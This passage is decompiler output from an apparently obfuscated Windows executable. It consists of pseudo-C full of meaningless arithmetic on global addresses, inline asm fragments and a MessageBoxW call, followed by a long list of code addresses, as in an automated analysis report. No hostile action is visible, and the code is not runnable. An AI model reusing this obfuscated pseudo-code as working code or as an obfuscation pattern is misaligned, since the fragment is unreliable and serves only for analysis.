									_t1693 = E00ECEE50(_t1692, _t2286, 0xbe790e28, 0x61b36);
									 *0x1000d1c = _t3123;
									 *0x1000d18 = _t1693;
									_t1695 =  *0x1000cc0; // 0xffff970a
									_t2506 =  *0x1000cc4; // 0xffffffff
									 *0x1000c94 = _v32 + _v5 + 1;
									_t3127 = _t1695 | _t2506;
									__eflags = _t3127;
									if(_t3127 == 0) {
										_t3129 = 1 - _v124;
										asm("sbb eax, ecx");
										_t1698 = E00ECEE50(_t3129, 0,  *0x1000ca8,  *0x1000cac);
										 *0x1000cac = _t3129;
										_t3127 =  *0x1000c83 & 0x000000ff;
										M01000CB0 = M01000CB0 ^ _t3127;
										__eflags = M01000CB0;
										 *0x1000ca8 = _t1698;
									} else {
										__eflags = _t1695 - 1;
										if(_t1695 != 1) {
											L404:
											__eflags = _t1695 - 2;
											if(_t1695 == 2) {
												__eflags = _t2506 - _t2286;
												if(_t2506 == _t2286) {
													_v192 = _t2286;
													__eflags = _v40;
													if(_v40 != 0) {
														_t2548 = 0;
														__eflags = 0;
													} else {
														_t2548 = 1;
													}
													_v192 = _t2286;
													__eflags = _v15;
													if(_v15 != 0) {
														_t1760 = 0;
														__eflags = 0;
													} else {
														_t1760 = 1;
													}
													_v28 = (_v124 - _t2548) *  *0x1000d10 * _t1760;
													asm("cdq");
													asm("sbb esi, edx");
													_t3127 = _v76;
													asm("sbb esi, eax");
													_v76 = _v76 - _v11 - _t3127;
												}
											}
										} else {
											__eflags = _t2506 - _t2286;
											if(_t2506 == _t2286) {
												 *0x1000d18 =  *0x1215420;
												 *0x1000d1c = _t2286;
												_v6 = _v6 & 0x000000ff & _v132 & 0x0000ffff | _v6 & 0x000000ff;
												_t3127 =  *0x10ae26c;
												 *0x1000d20 =  *0x1000d20 | _t3127;
											} else {
												goto L404;
											}
										}
									}
									_v224 = 0xe5;
									_v223 = 0xdd;
									_v222 = 0xe5;
									_v221 = 0xe7;
									_v220 = 0xea;
									_v219 = 0xf1;
									_t1701 = E00EC1190() & 0x000000ff;
									__eflags = _t1701 - _t2286;
									 *0x1000cd8 = _t1701;
									if(_t1701 > _t2286) {
										asm("cdq");
										 *0x1000d1c = _t2286;
										asm("adc edx, [0x1000cbc]");
										 *0x1000cc0 =  !(( *0x1000c83 & 0x000000ff) +  *0x1000cb8);
										 *0x1000cc4 =  !_t3127;
										 *0x1000d18 =  *0x1215420;
										_v92 = _v92 + 1;
										asm("adc [ebp-0x54], ebx");
									}
									_t2510 = _v68;
									_v60 = _t2510 + _t2510 + _t2510 + _t2510 + _t2510 + _t2510 + _t2510 + _t2510;
									_v56 = (_v64 << 0x00000020 | _t2510) << 3;
									 *0x10ae368 = _v60;
									_t3563 = 0;
									__eflags = 0;
									do {
										_t3132 = _v15;
										__eflags =  *0x1000c9b - _t3132; // -28
										if(__eflags >= 0) {
											__eflags = _v5;
											if(_v5 == 0) {
												_t1705 = _v112;
												_t3524 = _v56;
												asm("cdq");
												__eflags = _t1705 - _v60;
												if(_t1705 != _v60) {
													L423:
													_v148 = _v68 +  *0x1000d10 +  *0x1000c84 - _v5;
													_v48 = _v48 - (_v48 &  *0x1000cf0 & 0x0000ffff);
													 *0x1000ca0 =  *0x1000ca0 + _v128;
													 *0x1000c9e =  *0x1215420;
													 *0x1000c88 =  *0x1000c88 - _v68;
													asm("sbb [0x1000c8c], eax");
												} else {
													__eflags = _t3132 - _t3524;
													if(_t3132 == _t3524) {
														_t2540 =  *0x1000c88 |  *0x1000c8c;
														__eflags = _t2540;
														 *_t2540 =  *_t2540 + _t1705;
														__eflags =  *_t2540;
														if( *_t2540 != 0) {
															_t3528 = _v120;
															_t1711 =  *0x1000c83 & 0x000000ff;
															asm("cdq");
															_t2542 = _v124 - _t1711;
															__eflags = _t2542;
															asm("enter 0xfa1b, 0x8b");
															_push(_t3601);
															 *0x3DE8FE44 = _t2542;
															_v124 = _t2542;
															_v120 = _t3528 & _t1711;
															_v14 = (_v14 & 0x000000ff) + (_v28 & 0x0000ffff);
															_t1712 = _v8;
															 *0x1000cf0 = 0x73c571ff;
															_t2547 = _t1712 +  *0x1000cc8 + 1;
															__eflags = _t2547;
															 *0x1000cd4 = _t2547;
															 *0x1000cf4 = 0;
															_t1713 = _t1712 + 0x1000cf4;
															__eflags = _t1713;
															 *_t2547 =  *_t2547 + _t1713;
															 *_t1713 =  *_t1713 + _t1713;
															 *_t1713 =  *_t1713 + _t1713;
															__eflags =  *_t1713;
														}
													} else {
														goto L423;
													}
												}
											} else {
												_t2538 =  *0x1000d04; // 0xffffffff
												asm("cdq");
												_t1715 =  *0x1000d00; // 0xfffff835
												_t3168 = _t3132 & _t2538;
												 *0x1000d00 = E00ECEE50(_v32 & _t1715, _t3168, _t1715, _t2538);
												 *0x1000d04 = _t3168;
											}
										}
										 *(_t3601 + _t3563 * 2 - 0x160) = ( *(_t3601 + _t3563 - 0xdc) & 0x000000ff) + 0x00000068 & 0x000000ff;
										_t3563 = _t3563 + 1;
										__eflags = _t3563 - 6;
									} while (_t3563 < 6);
									_t2519 =  *0x1000d00; // 0xfffff835
									 *0x1000ce0 = 2;
									 *0x1000ce4 = 0;
									_v116 = _t2519 * 0x6eb594ba;
									_t2521 =  *0x1000ce4; // 0x0
									 *0x110030c = _v100;
									_t1718 =  *0x1000ce0; // 0x0
									_t3138 = _t1718 | _t2521;
									__eflags = _t3138;
									if(_t3138 == 0) {
										_v192 = 0;
										__eflags = _v10;
										if(_v10 != 0) {
											_t1719 = 0;
											__eflags = 0;
										} else {
											_t1719 = 1;
										}
										_t2523 =  *0x1000d00 + _t1719;
										__eflags = _t2523;
										_v40 =  !_t2523;
									} else {
										__eflags = _t1718 - 1;
										if(_t1718 != 1) {
											L439:
											__eflags = _t1718 - 2;
											if(_t1718 == 2) {
												__eflags = _t2521;
												if(_t2521 == 0) {
													_t1744 =  *0x1000cdc; // 0x84521e70
													_v100 = (_v108 ^ _t1744 ^  *0x1000d00) * (_t1744 + 0xffffbb58);
													_t3157 =  *0x1000c94; // 0x0
													_t3158 = _t3157 * 0x2d40daef;
													_v128 = _v128 * ( *0x1000cec & 0x0000ffff);
													_v148 = _t3158;
													asm("cdq");
													_v60 = (_v136 & 0x0000ffff) + (_v136 & 0x0000ffff) + (_v136 & 0x0000ffff) + (_v136 & 0x0000ffff) + (_v136 & 0x0000ffff) + (_v136 & 0x0000ffff) + (_v136 & 0x0000ffff) + (_v136 & 0x0000ffff);
													_v56 = _t3158;
												}
											}
										} else {
											__eflags = _t2521;
											if(_t2521 == 0) {
												asm("cdq");
												 *0x1000cb8 = _v8 - 0x4fef3c23;
												 *0x1000cbc = _t3138;
												_v80 =  *0x1215420;
												 *0x1000cd0 =  *0x1000cd0 +  *0x1000cd0 -  *0x1000ce0;
											} else {
												goto L439;
											}
										}
									}
									_t3144 = (_v200 + _v168) * _v200 * _v24 ^ 0x0000701c;
									__eflags = _t3144;
									_v344 =  ~_t3144;
									_t1721 = 0x20b;
									do {
										_v15 = _v15 + 1;
										_t1721 = _t1721 - 1;
										__eflags = _t1721;
									} while (_t1721 > 0);
									_t1724 = (_v28 & 0x0000ffff |  *0x1000c9a) +  *0x1000c9f;
									__eflags = _t1724;
									 *0x1000c84 = 0;
									if(_t1724 != 0) {
										_t3564 = 0;
										__eflags = 0;
									} else {
										_t1233 = _t1724 + 1; // 0x20b
										_t3564 = _t1233;
									}
									asm("cdq");
									_t3149 = _v48;
									asm("cdq");
									asm("adc edx, [0x1000cc4]");
									_t1730 = E00ECEE50((_v28 & 0x0000ffff) + (_v16 & 0x000000ff) + 1, _v16, _t3149 +  *0x1000cc0, _t3149);
									asm("sbb edx, edi");
									__eflags = _t1730 - _t3564 | _t3149;
									 *0x1000c83 = 1;
									if((_t1730 - _t3564 | _t3149) != 0) {
										 *0x1000c83 = 0;
									}
									__eflags =  *0x1000c84;
									if( *0x1000c84 == 0) {
										_v40 = 0x83;
										asm("cdq");
										 *0x1000cc8 = (_v28 & 0x0000ffff) + 0xf;
										_t1736 =  *0x1000cd0; // 0x0
										 *0x1000ccc = _t3149;
										_v9 = _v7 + _v44 + (_t1736 & 0x000000e4) - M01000CB0 +  *0x1000cb8 - 0x2d;
										asm("cdq");
										_v164 = _v164 -  *0x1000cd0 - 0x3811;
										asm("sbb [ebp-0x9c], edx");
									}
									_t1246 =  &_v356; // 0x60f1ba1c
									_t3030 = _t1246;
									_t1247 =  &_v432; // 0x60f1b9d0
									_t1509 = _t1247;
									L530:
									MessageBoxW(GetForegroundWindow(), _t1509, _t3030, 0x10);
								}
								goto L531;
							} else {
								if(_v116 != 0 || _v13 != 0) {
									_t3530 = 0xcb;
									do {
										_t3222 = _v44;
										_t1837 = E00EC1370(__eflags) & 0x000000ff;
										asm("cdq");
										 *0x1000cb8 = _t1837;
										 *0x1000cbc = _t3222;
										__eflags = _t3222 - _t2286;
										if(_t3222 > _t2286) {
											L312:
											_t1838 =  *0x1000c98 & 0x0000ffff;
											_t2608 =  *0x1000cac; // 0x106b42
											_t3569 =  *0x1000ca8; // 0x7b8b5249
											asm("cdq");
											_t3570 =  !_t3569;
											__eflags = _t3222 -  !_t2608;
											if(__eflags <= 0) {
												if(__eflags < 0) {
													L315:
													_v140 = _v92 + 0xc125;
													_t2611 =  *0x1000cf4; // 0x2b91c
													_t2612 =  *0x1000cf0; // 0xd43579fe
													asm("cdq");
													 *0x1000cf0 = E00ECEE50(_v8 * 0x63, _v8, _t2612, _t2611);
													_t1846 = _v5;
													 *0x1000cf4 = _t1846 *  *0x1000c88 >> 0x20;
													_v5 = _t1846 *  *0x1000c88;
													M01000CB0 = 4;
													_v92 = _v92 + 1;
													asm("adc [ebp-0x54], ebx");
												} else {
													__eflags = _t1838 - _t3570;
													if(_t1838 < _t3570) {
														goto L315;
													}
												}
											}
										} else {
											__eflags = _t1837 - 0x42;
											if(_t1837 >= 0x42) {
												goto L312;
											}
										}
										 *0x1000cf0 =  *0x1000cf0 + 1;
										asm("adc [0x1000cf4], ebx");
										_t3530 = _t3530 - 1;
										__eflags = _t3530;
									} while (__eflags != 0);
									goto L317;
								} else {
									asm("cdq");
									if((_v144 |  *0x1000cb8 | _v144 |  *0x1000cbc) == 0) {
										__eflags =  *0x1000ca0 - _t2286; // 0x5247
										if(__eflags == 0) {
											L317:
											E00EC1970();
											L00EC1DA0();
											__eflags = 0;
											return 0;
										} else {
											 *0x1000d10 = 0x2bd9;
											 *0x1000d14 = _t2286;
											_v44 = (_v116 & 0xcecd084b) * _v44;
											_v112 = (_v9 & 0x000000ff) * _v11;
											M01000CB0 = _v19 * M01000CB0;
											_v80 =  *0x1215420;
											E00EC1970();
											L00EC1DA0();
											__eflags = 0;
											return 0;
										}
									} else {
										_t2617 =  *0x1000c9e; // 0x0
										_v11 = _v44 + _v148;
										 *0x1000c9b = _t2617 - 0x26;
										E00EC1970();
										L00EC1DA0();
										return 0;
									}
								}
							}
						}
					}
				}
			}



















































































































































































































































































































































































































































































































































































































                                              0x00ec35e9
                                              0x00ec35f3
                                              0x00ec35f4
                                              0x00ec3601
                                              0x00ec360e
                                              0x00ec3611
                                              0x00ec3618
                                              0x00ec361f
                                              0x00ec3623
                                              0x00ec3627
                                              0x00ec362b
                                              0x00ec362e
                                              0x00ec3634
                                              0x00ec3637
                                              0x00ec363b
                                              0x00ec3645
                                              0x00ec3646
                                              0x00ec3649
                                              0x00ec364e
                                              0x00ec3651
                                              0x00ec3657
                                              0x00ec365b
                                              0x00ec365f
                                              0x00ec3665
                                              0x00ec366b
                                              0x00ec3672
                                              0x00ec3679
                                              0x00ec3680
                                              0x00ec3687
                                              0x00ec368a
                                              0x00ec3695
                                              0x00ec36a0
                                              0x00ec36ab
                                              0x00ec36b6
                                              0x00ec36be
                                              0x00ec36ca
                                              0x00ec36ce
                                              0x00ec36d2
                                              0x00ec36d5
                                              0x00ec36da
                                              0x00ec36dd
                                              0x00ec36e0
                                              0x00ec36e7
                                              0x00ec36f5
                                              0x00ec36f6
                                              0x00ec3700
                                              0x00ec3703
                                              0x00ec3707
                                              0x00ec3710
                                              0x00ec371b
                                              0x00ec371e
                                              0x00ec3725
                                              0x00ec372f
                                              0x00ec3732
                                              0x00ec3736
                                              0x00ec3739
                                              0x00ec3743
                                              0x00ec3745
                                              0x00ec374b
                                              0x00ec3752
                                              0x00ec3759
                                              0x00ec3761
                                              0x00ec3768
                                              0x00ec3776
                                              0x00ec378d
                                              0x00ec379e
                                              0x00ec37a5
                                              0x00ec37be
                                              0x00ec37c4
                                              0x00ec37ca
                                              0x00ec37d9
                                              0x00ec37ef
                                              0x00ec37fa
                                              0x00ec37fd
                                              0x00ec3806
                                              0x00ec3818
                                              0x00ec382a
                                              0x00ec386a
                                              0x00ec3870
                                              0x00ec3876
                                              0x00ec387e
                                              0x00ec3885
                                              0x00ec389a
                                              0x00ec38a1
                                              0x00ec38a2
                                              0x00ec38a2
                                              0x00ec38a5
                                              0x00ec38ac
                                              0x00ec38b1
                                              0x00ec38b1
                                              0x00ec382c
                                              0x00ec382c
                                              0x00ec3832
                                              0x00ec383f
                                              0x00ec3843
                                              0x00ec3848
                                              0x00ec384e
                                              0x00ec3855
                                              0x00ec3863
                                              0x00ec3863
                                              0x00ec382a
                                              0x00ec38c0
                                              0x00ec38d4
                                              0x00ec38da
                                              0x00ec38ed
                                              0x00ec38f0
                                              0x00ec38f2
                                              0x00ec38f8
                                              0x00ec38ff
                                              0x00ec391f
                                              0x00ec391f
                                              0x00ec38f8
                                              0x00ec392e
                                              0x00ec393f
                                              0x00ec394e
                                              0x00ec3954
                                              0x00ec395b
                                              0x00ec3963
                                              0x00ec3986
                                              0x00ec398b
                                              0x00ec39d8
                                              0x00ec39e8
                                              0x00ec39f4
                                              0x00ec3a03
                                              0x00ec3a04
                                              0x00ec3a0f
                                              0x00ec3a1c
                                              0x00ec3a1c
                                              0x00ec3a23
                                              0x00ec398d
                                              0x00ec3994
                                              0x00ec3999
                                              0x00ec39a2
                                              0x00ec39a8
                                              0x00ec39b3
                                              0x00ec39c4
                                              0x00ec39ca
                                              0x00ec39d0
                                              0x00ec39d0
                                              0x00ec3a33
                                              0x00ec3a42
                                              0x00ec3a48
                                              0x00ec3a4d
                                              0x00ec3a50
                                              0x00ec3a5a
                                              0x00ec3a5d
                                              0x00ec3a63
                                              0x00ec3a6a
                                              0x00ec3a71
                                              0x00ec3aac
                                              0x00ec3ab2
                                              0x00ec3abf
                                              0x00ec3ac3
                                              0x00ec3ac9
                                              0x00ec3ad0
                                              0x00ec3ad6
                                              0x00ec3ad6
                                              0x00ec3ad2
                                              0x00ec3ad2
                                              0x00ec3ad2
                                              0x00ec3ae0
                                              0x00ec3af2
                                              0x00ec3afd
                                              0x00ec3afd
                                              0x00ec3b06
                                              0x00ec3a73
                                              0x00ec3a75
                                              0x00ec3a89
                                              0x00ec3a8e
                                              0x00ec3a95
                                              0x00ec3a95
                                              0x00ec3a75
                                              0x00ec3b15
                                              0x00ec3b1b
                                              0x00ec3b20
                                              0x00ec3b20
                                              0x00ec3b2c
                                              0x00ec3b2f
                                              0x00ec3b32
                                              0x00ec3b35
                                              0x00ec3b35
                                              0x00ec3b3e
                                              0x00ec3b44
                                              0x00ec3b54
                                              0x00ec3b5a
                                              0x00ec3b61
                                              0x00ec3b77
                                              0x00ec3b7d
                                              0x00ec3b83
                                              0x00ec3b95
                                              0x00ec3b95
                                              0x00ec3b91
                                              0x00ec3b91
                                              0x00ec3b91
                                              0x00ec3ba2
                                              0x00ec3bf4
                                              0x00ec3bf9
                                              0x00ec3bff
                                              0x00ec3c09
                                              0x00ec3c09
                                              0x00ec3c01
                                              0x00ec3c01
                                              0x00ec3c07
                                              0x00ec3c0d
                                              0x00ec3c0d
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00ec3c07
                                              0x00ec3c1e
                                              0x00ec3c20
                                              0x00ec3c4f
                                              0x00ec3c54
                                              0x00ec3c5a
                                              0x00ec3c60
                                              0x00ec3c60
                                              0x00ec3c5c
                                              0x00ec3c5c
                                              0x00ec3c5c
                                              0x00ec3c69
                                              0x00ec3c76
                                              0x00ec3cb2
                                              0x00ec3cb4
                                              0x00ec3cc3
                                              0x00ec3cc5
                                              0x00ec3ccb
                                              0x00ec3cd1
                                              0x00ec3cd1
                                              0x00ec3ccd
                                              0x00ec3ccd
                                              0x00ec3ccd
                                              0x00ec3ce0
                                              0x00ec3ce6
                                              0x00ec3ce6
                                              0x00ec3ce8
                                              0x00000000
                                              0x00ec3ce8
                                              0x00ec3c78
                                              0x00ec3c78
                                              0x00ec3c7d
                                              0x00ec3c87
                                              0x00ec3c9f
                                              0x00ec3ca1
                                              0x00ec3ca8
                                              0x00ec3ced
                                              0x00ec3ced
                                              0x00ec3ced
                                              0x00ec3c22
                                              0x00ec3c29
                                              0x00ec3c2a
                                              0x00ec3c2d
                                              0x00ec3c30
                                              0x00ec3c3c
                                              0x00ec3c43
                                              0x00ec3c43
                                              0x00ec3ba4
                                              0x00ec3ba9
                                              0x00ec3bcc
                                              0x00ec3be3
                                              0x00ec3bea
                                              0x00ec3bab
                                              0x00ec3bab
                                              0x00ec3bb0
                                              0x00ec3bbc
                                              0x00000000
                                              0x00ec3bbe
                                              0x00ec3bbe
                                              0x00ec3bca
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00ec3bca
                                              0x00ec3bbc
                                              0x00ec3ba9
                                              0x00ec3cf4
                                              0x00ec3d05
                                              0x00ec3d09
                                              0x00ec3d17
                                              0x00ec3d26
                                              0x00ec3d37
                                              0x00ec3d3c
                                              0x00ec3d45
                                              0x00ec3d4b
                                              0x00ec3d51
                                              0x00ec3d58
                                              0x00ec3d65
                                              0x00ec3d6f
                                              0x00ec3d74
                                              0x00ec3d8d
                                              0x00ec3d94
                                              0x00ec3d94
                                              0x00ec3d74
                                              0x00ec3d98
                                              0x00ec3d9e
                                              0x00ec3da4
                                              0x00ec3dac
                                              0x00ec4ee8
                                              0x00ec4ef3
                                              0x00ec4efc
                                              0x00ec4f05
                                              0x00ec4f13
                                              0x00ec4f20
                                              0x00ec4f25
                                              0x00ec4f2a
                                              0x00ec4f30
                                              0x00ec4f38
                                              0x00ec4f3a
                                              0x00ec4f3c
                                              0x00ec4f3f
                                              0x00ec4f45
                                              0x00ec4f45
                                              0x00ec4f41
                                              0x00ec4f41
                                              0x00ec4f41
                                              0x00ec4f47
                                              0x00ec4f4e
                                              0x00ec4f5e
                                              0x00ec4f61
                                              0x00ec4f6d
                                              0x00ec4f7d
                                              0x00ec4f84
                                              0x00ec4f96
                                              0x00ec4f97
                                              0x00ec4f9d
                                              0x00ec4fa8
                                              0x00ec4fb7
                                              0x00ec4fbd
                                              0x00ec4fc4
                                              0x00ec4fd0
                                              0x00ec4fd2
                                              0x00ec4fd5
                                              0x00ec4fdb
                                              0x00ec4fe1
                                              0x00ec4fe7
                                              0x00ec4fe7
                                              0x00ec4fe3
                                              0x00ec4fe3
                                              0x00ec4fe3
                                              0x00ec4ff4
                                              0x00ec4ff5
                                              0x00ec4ff8
                                              0x00ec4fff
                                              0x00ec5000
                                              0x00ec5003
                                              0x00ec5009
                                              0x00000000
                                              0x00ec501f
                                              0x00000000
                                              0x00000000
                                              0x00ec502b
                                              0x00ec502f
                                              0x00ec5035
                                              0x00000000
                                              0x00000000
                                              0x00ec503e
                                              0x00ec5045
                                              0x00ec504c
                                              0x00ec5055
                                              0x00ec5057
                                              0x00ec505a
                                              0x00ec505c
                                              0x00ec5060
                                              0x00ec5062
                                              0x00ec5065
                                              0x00ec5068
                                              0x00ec506d
                                              0x00ec5070
                                              0x00ec5073
                                              0x00ec5078
                                              0x00ec507a
                                              0x00ec507c
                                              0x00ec507d
                                              0x00ec507f
                                              0x00ec5082
                                              0x00ec5087
                                              0x00ec508e
                                              0x00ec5095
                                              0x00ec509a
                                              0x00ec509c
                                              0x00ec509e
                                              0x00ec50a4
                                              0x00000000
                                              0x00000000
                                              0x00ec50ae
                                              0x00ec50b4
                                              0x00ec50bb
                                              0x00ec50c1
                                              0x00ec50c4
                                              0x00ec50c8
                                              0x00ec50ce
                                              0x00ec50d3
                                              0x00ec50d6
                                              0x00ec50df
                                              0x00ec50df
                                              0x00ec50e2
                                              0x00ec50ec
                                              0x00ec50ee
                                              0x00ec50e4
                                              0x00ec50e4
                                              0x00ec50e6
                                              0x00ec50e6
                                              0x00000000
                                              0x00000000
                                              0x00ec50f4
                                              0x00ec50fa
                                              0x00ec50ff
                                              0x00ec5105
                                              0x00ec510b
                                              0x00ec510d
                                              0x00ec5113
                                              0x00ec511b
                                              0x00ec511b
                                              0x00ec511e
                                              0x00ec5124
                                              0x00ec512a
                                              0x00ec5130
                                              0x00ec5130
                                              0x00ec512c
                                              0x00ec512c
                                              0x00ec512c
                                              0x00ec5132
                                              0x00ec5138
                                              0x00ec513e
                                              0x00ec5141
                                              0x00ec5143
                                              0x00ec5146
                                              0x00ec514a
                                              0x00ec514a
                                              0x00ec5150
                                              0x00000000
                                              0x00000000
                                              0x00ec5009
                                              0x00ec5153
                                              0x00ec5162
                                              0x00ec5174
                                              0x00ec5183
                                              0x00ec5189
                                              0x00ec518b
                                              0x00ec51a2
                                              0x00ec51a5
                                              0x00ec51b2
                                              0x00ec51c2
                                              0x00ec51d4
                                              0x00ec51e7
                                              0x00ec51f5
                                              0x00ec51f8
                                              0x00ec51ff
                                              0x00ec5205
                                              0x00ec520f
                                              0x00ec5215
                                              0x00ec521b
                                              0x00ec5221
                                              0x00ec5227
                                              0x00ec522d
                                              0x00ec5233
                                              0x00ec5239
                                              0x00ec5246
                                              0x00ec524c
                                              0x00ec525d
                                              0x00ec5264
                                              0x00ec526b
                                              0x00ec5272
                                              0x00ec5279
                                              0x00ec5280
                                              0x00ec5287
                                              0x00ec528d
                                              0x00ec5294
                                              0x00ec529b
                                              0x00ec52a2
                                              0x00ec52a9
                                              0x00ec52b0
                                              0x00ec52b7
                                              0x00ec52be
                                              0x00ec52c5
                                              0x00ec52cc
                                              0x00ec52d3
                                              0x00ec52da
                                              0x00ec52e1
                                              0x00ec52e8
                                              0x00ec52ee
                                              0x00ec52f5
                                              0x00ec52fc
                                              0x00ec5303
                                              0x00ec530a
                                              0x00ec5311
                                              0x00ec5318
                                              0x00ec531f
                                              0x00ec5326
                                              0x00ec532d
                                              0x00ec5334
                                              0x00ec533b
                                              0x00ec5342
                                              0x00ec5349
                                              0x00ec5350
                                              0x00ec5365
                                              0x00ec536b
                                              0x00ec536e
                                              0x00ec537a
                                              0x00ec537f
                                              0x00ec537f
                                              0x00ec5381
                                              0x00ec538c
                                              0x00ec538d
                                              0x00ec539a
                                              0x00ec53a0
                                              0x00ec53a5
                                              0x00ec53a5
                                              0x00ec53a7
                                              0x00ec53ae
                                              0x00ec53ae
                                              0x00ec53a9
                                              0x00ec53a9
                                              0x00ec53a9
                                              0x00ec53bb
                                              0x00ec53dd
                                              0x00ec53e1
                                              0x00ec53eb
                                              0x00ec53fb
                                              0x00ec53fd
                                              0x00ec5400
                                              0x00ec5408
                                              0x00ec5409
                                              0x00ec5409
                                              0x00ec541e
                                              0x00ec5422
                                              0x00ec5429
                                              0x00ec5436
                                              0x00ec543c
                                              0x00ec54db
                                              0x00ec54dc
                                              0x00ec54e2
                                              0x00ec54e6
                                              0x00ec54ea
                                              0x00ec54fa
                                              0x00ec5500
                                              0x00ec5500
                                              0x00ec5503
                                              0x00ec5442
                                              0x00ec5449
                                              0x00ec544f
                                              0x00ec5455
                                              0x00ec545d
                                              0x00ec5463
                                              0x00ec5476
                                              0x00ec5476
                                              0x00ec5476
                                              0x00ec5465
                                              0x00ec5465
                                              0x00ec546f
                                              0x00ec546f
                                              0x00ec5467
                                              0x00ec5467
                                              0x00ec546d
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00ec546d
                                              0x00ec5465
                                              0x00ec548b
                                              0x00ec548d
                                              0x00ec548f
                                              0x00ec549e
                                              0x00ec54a1
                                              0x00ec54a7
                                              0x00ec54b9
                                              0x00ec54ba
                                              0x00ec54bf
                                              0x00ec54bf
                                              0x00ec548d
                                              0x00ec544f
                                              0x00ec550e
                                              0x00000000
                                              0x00ec550e
                                              0x00ec3db2
                                              0x00ec3db2
                                              0x00ec3db8
                                              0x00ec3dc7
                                              0x00ec3dca
                                              0x00ec3dd3
                                              0x00ec3dda
                                              0x00ec3e01
                                              0x00ec3e07
                                              0x00ec3e10
                                              0x00ec3e13
                                              0x00ec3e1d
                                              0x00ec3e29
                                              0x00ec3e2f
                                              0x00ec3e35
                                              0x00ec3e3e
                                              0x00ec3e45
                                              0x00ec3e4b
                                              0x00ec3e4d
                                              0x00ec3e4d
                                              0x00ec3e52
                                              0x00ec3e58
                                              0x00ec3e6c
                                              0x00ec3e7b
                                              0x00ec3e7d
                                              0x00ec3e82
                                              0x00ec3e88
                                              0x00ec3ee2
                                              0x00ec3ee8
                                              0x00ec3ef0
                                              0x00ec3ef2
                                              0x00ec3efd
                                              0x00ec3efd
                                              0x00ec3efd
                                              0x00ec3ef4
                                              0x00ec3ef4
                                              0x00ec3efb
                                              0x00000000
                                              0x00000000
                                              0x00ec3efb
                                              0x00ec3eff
                                              0x00ec3f06
                                              0x00ec3f0f
                                              0x00ec3f0f
                                              0x00ec3f08
                                              0x00ec3f08
                                              0x00ec3f08
                                              0x00ec3f15
                                              0x00ec3f17
                                              0x00ec3f19
                                              0x00ec3f28
                                              0x00ec3f28
                                              0x00ec3f28
                                              0x00ec3f1b
                                              0x00ec3f1b
                                              0x00ec3f21
                                              0x00ec3f21
                                              0x00ec3f1d
                                              0x00ec3f1d
                                              0x00ec3f1f
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00ec3f1f
                                              0x00ec3f1b
                                              0x00ec3f2a
                                              0x00ec3f2d
                                              0x00ec3f2f
                                              0x00ec3f31
                                              0x00ec3f35
                                              0x00ec3f3b
                                              0x00ec3f42
                                              0x00ec3f48
                                              0x00ec3f4b
                                              0x00ec3f54
                                              0x00ec3f54
                                              0x00ec3f4d
                                              0x00ec3f4d
                                              0x00ec3f4d
                                              0x00ec3f75
                                              0x00ec3f7b
                                              0x00ec3f83
                                              0x00ec3f83
                                              0x00ec3f85
                                              0x00ec3f8b
                                              0x00ec3f8b
                                              0x00ec3e8a
                                              0x00ec3e8a
                                              0x00ec3e90
                                              0x00ec3e9d
                                              0x00ec3eb0
                                              0x00ec3eb0
                                              0x00ec3eac
                                              0x00ec3eac
                                              0x00ec3eac
                                              0x00ec3eb2
                                              0x00ec3ebb
                                              0x00ec3ec8
                                              0x00ec3ece
                                              0x00ec3ed3
                                              0x00ec3ed9
                                              0x00ec3ed9
                                              0x00ec3ec8
                                              0x00ec3e5a
                                              0x00ec3e5a
                                              0x00ec3e60
                                              0x00ec3e66
                                              0x00000000
                                              0x00000000
                                              0x00ec3e66
                                              0x00ec3e58
                                              0x00ec3fa9
                                              0x00ec3faa
                                              0x00ec3fab
                                              0x00ec3fad
                                              0x00ec3fb7
                                              0x00ec3fbd
                                              0x00ec3fc4
                                              0x00ec3fd7
                                              0x00ec3fdd
                                              0x00ec3fde
                                              0x00ec3fe4
                                              0x00ec3fe6
                                              0x00ec3feb
                                              0x00ec3fed
                                              0x00ec3ff3
                                              0x00ec3ff6
                                              0x00ec4000
                                              0x00ec4004
                                              0x00ec4009
                                              0x00ec4009
                                              0x00ec400e
                                              0x00ec4016
                                              0x00ec4021
                                              0x00ec4027
                                              0x00ec4031
                                              0x00ec404b
                                              0x00ec4050
                                              0x00ec4075
                                              0x00ec407b
                                              0x00ec407c
                                              0x00ec407e
                                              0x00ec4090
                                              0x00ec4090
                                              0x00ec4090
                                              0x00ec4080
                                              0x00ec4080
                                              0x00ec4085
                                              0x00ec4087
                                              0x00000000
                                              0x00ec4089
                                              0x00ec4089
                                              0x00ec4089
                                              0x00ec4087
                                              0x00ec409b
                                              0x00ec409d
                                              0x00ec409f
                                              0x00ec40a9
                                              0x00ec40af
                                              0x00ec40ba
                                              0x00ec40bc
                                              0x00ec40c2
                                              0x00ec40c8
                                              0x00ec40d4
                                              0x00ec40e1
                                              0x00ec40ea
                                              0x00ec40f4
                                              0x00ec40f7
                                              0x00ec40fe
                                              0x00ec4105
                                              0x00ec410c
                                              0x00ec410d
                                              0x00ec410d
                                              0x00ec410f
                                              0x00ec4111
                                              0x00ec4117
                                              0x00ec4117
                                              0x00ec4052
                                              0x00ec4052
                                              0x00ec4060
                                              0x00ec4060
                                              0x00ec4063
                                              0x00ec4063
                                              0x00ec4067
                                              0x00ec4067
                                              0x00ec4126
                                              0x00ec412c
                                              0x00ec4131
                                              0x00ec4138
                                              0x00ec423b
                                              0x00ec4247
                                              0x00ec424b
                                              0x00ec413e
                                              0x00ec4143
                                              0x00ec4157
                                              0x00ec415b
                                              0x00ec416b
                                              0x00ec4171
                                              0x00ec4178
                                              0x00ec417b
                                              0x00ec417d
                                              0x00ec4193
                                              0x00ec4195
                                              0x00ec419b
                                              0x00ec41e5
                                              0x00ec41f6
                                              0x00ec41fd
                                              0x00ec41fe
                                              0x00ec420d
                                              0x00ec4215
                                              0x00ec4215
                                              0x00ec4217
                                              0x00ec421d
                                              0x00ec4224
                                              0x00ec4224
                                              0x00ec421f
                                              0x00ec421f
                                              0x00ec421f
                                              0x00ec422f
                                              0x00ec419d
                                              0x00ec419d
                                              0x00ec41a0
                                              0x00ec41c6
                                              0x00ec41ce
                                              0x00ec41da
                                              0x00ec41e0
                                              0x00ec41a2
                                              0x00ec41a5
                                              0x00ec41b1
                                              0x00ec41b1
                                              0x00ec41a5
                                              0x00ec41a0
                                              0x00ec419b
                                              0x00ec4255
